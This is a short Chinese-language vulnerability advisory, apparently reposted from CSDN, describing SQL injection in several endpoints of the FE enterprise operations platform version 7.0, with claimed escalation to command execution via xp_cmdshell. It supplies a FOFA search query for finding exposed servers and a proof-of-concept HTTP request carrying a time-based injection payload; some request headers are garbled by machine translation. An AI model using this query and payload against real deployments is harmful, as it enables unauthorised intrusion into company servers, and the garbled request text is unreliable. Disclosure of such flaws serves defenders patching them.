0x01 产品简介
飞骑互联网-FE企业运营管理平台是基于云计算、智能化、大数据、物联网、移动互联网等技术支持的云工作台。平台连接人、链接、内外部连接,支撑B2B、C2B、O2O等企业核心需求,支撑跨行业客户的互联网+转型。其特点是提供集人工智能、大数据分析、物联网设备管理为一体的云工作环境,全面支撑不同行业客户的互联网+转型。通过智能决策支持和数据驱动的业务优化,企业可以更加灵活高效地运营业务,实现数字化转型的战略目标。
0x02 漏洞概述
飞旗互联网-FE企业运营管理平台checkGroupCode、efficientCodewidget39、ajax_codewidget39等接口存在SQL注入漏洞,未经授权的攻击者可利用这些漏洞操纵数据库xp_cmdshell,执行任意命令,从而具有运行和控制服务器的可能。经分析判断,该漏洞利用难度较大,建议您尽快修复。
0x03影响范围
7.0版本
0x04复现环境
FOFA: app=\’FE-协作平台\’
0x05漏洞复现
概念验证-1
GET /docexchangeManage/checkGroupCode.js%70?code=1\’;waitfor+delay+\’0:0:5\’– HTTP/1.1
Host:你的IP
Accept: 应用程序/json,文本/javascript,*/*
用户代理: Mozilla/
#飞骑以上有关互联网相关内容来源网络,仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92754.html